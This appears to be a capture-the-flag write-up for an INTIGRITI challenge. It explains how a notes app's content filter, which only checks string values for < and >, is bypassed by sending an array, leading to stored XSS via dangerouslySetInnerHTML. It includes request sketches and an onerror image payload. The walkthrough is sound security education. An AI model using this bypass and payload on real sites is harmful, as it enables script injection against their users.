“Welcome to Leaky Flagment” or…“Welcome to client-side hell” :)

Introduction

This was one of the hardest INTIGRITI challenges I've ever completed. It involved client-side vulnerabilities (Cross-Site Scripting, browser cache poisoning) and several business logic flaws. I learned a lot from it, so huge congrats to @0x999 for this beautiful challenge!


Goal

ℹ️ Information & Goal

Your goal is to leak the Bot's flag to a remote host by submitting a URL. Below is the sequence of actions the bot will perform after receiving a URL:

Solution

Let's cut to the chase: we're diving straight into the challenge solution with little to no upfront context, so that even this tough challenge will seem "relatively easy" (no, I'm not being lazy). Don't worry, I'll provide context as soon as it's needed.

Uploading a malicious note 📝

In this application we can authenticate ourselves and create (and view) our personal notes. These notes are private, meaning only the person who created them can see them (will that hold true, though?).

The first thing we notice in the code responsible for rendering a single note is the following snippet:

<CardContent className="flex-1 pt-6 border-t border-rose-100">
  <div className="bg-white/80 backdrop-blur-sm p-8 rounded-xl border border-rose-200 shadow-sm min-h-[400px]">
    <div
      className="prose max-w-none text-gray-700 whitespace-pre-wrap break-words"
      dangerouslySetInnerHTML={{ __html: note.content }}
    />
  </div>
</CardContent>

dangerouslySetInnerHTML, huh? This is an XSS sink and, if not protected properly, it might be useful to us. So let's see how a note is created through the /api/post endpoint.

case 'POST':
    try {
        let secret_cookie;
        
        // [Cookie retrieval and checks]
        // Returns if the cookie is incorrect
        // ...
        
        const content_type = req.headers['content-type'];
        if (content_type && !content_type.startsWith('application/json')) {
            return res.status(400).json({ message: 'Invalid content type' });
        }

The first interesting check is the one on the Content-Type header: if the header is present and does not start with application/json, the handler returns a 400, preventing us from creating the note. Note that this is a prefix match on an optional header, not an exact match.
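To make the behavior of this check explicit, here is a tiny sketch (the logic is copied from the handler above; the helper name is mine):

const passesContentTypeCheck = (contentType) =>
    !contentType || contentType.startsWith('application/json');

passesContentTypeCheck(undefined);                          // true  - no header at all is accepted
passesContentTypeCheck('application/json');                 // true
passesContentTypeCheck('application/json; charset=utf-8');  // true  - prefix match
passesContentTypeCheck('text/plain');                       // false - rejected with a 400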

        // [Validates the user's secret (cookie) by retrieving the associated user data
        // from Redis using a key generated from the cookie. If no user data is found,
        // it returns a 403 Unauthorized response.]
        // ...

        const body = typeof req.body === 'string' ? JSON.parse(req.body) : req.body;
        const { title, content, use_password } = body;
        if (!title || !content) {
            return res.status(400).json({ message: 'Please provide a title and content' });
        }
        if (typeof content === 'string' && (content.includes('<') || content.includes('>'))) {
            return res.status(400).json({ message: 'Invalid value for title or content' });
        }
        if (title.length > 50 || content.length > 1000) {
            return res.status(400).json({ message: 'Title must not exceed 50 characters and content must not exceed 500 characters' });
        }

Other important checks follow: the handler parses the request body and validates that both title and content are provided; it rejects content containing < or > characters, to block HTML tags and thus potential XSS payloads; and it validates that title and content don't exceed the specified length limits.
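For reference, a compliant note creation would look something like this (a sketch: the endpoint and field names come from the snippets above, while the exact cookie handling is omitted):

// Hypothetical baseline request - passes every check in the handler above
await fetch('/api/post', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' }, // accepted by the prefix check
    credentials: 'include', // the secret cookie must be sent along
    body: JSON.stringify({
        title: 'My note',               // <= 50 characters
        content: 'Just a regular note', // string without < or >, <= 1000 characters
        use_password: false             // destructured by the handler; its logic is not shown here
    })
});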

Is the XSS prevention mechanism properly implemented? Of course not. The < / > check only runs when content is a string (note the typeof content === 'string' guard), so sending the note content as an array skips the HTML tag check entirely.

After that, the note is successfully stored in Redis, leaving us with a stored XSS.
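Putting it together, a request along these lines (again a sketch, not the exact exploit) plants the payload. Since HTML injected through innerHTML does not execute <script> tags, an event-handler attribute such as onerror is the natural vector:

// Hypothetical bypass request - content is an array, so the
// typeof content === 'string' guard never inspects it for < or >
await fetch('/api/post', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    credentials: 'include',
    body: JSON.stringify({
        title: 'totally harmless note',
        // the payload reaches dangerouslySetInnerHTML when the note is viewed
        content: ['<img src=x onerror=alert(document.domain)>'],
        use_password: false
    })
});

When the note is later viewed, the payload lands in the dangerouslySetInnerHTML sink from the first snippet and executes.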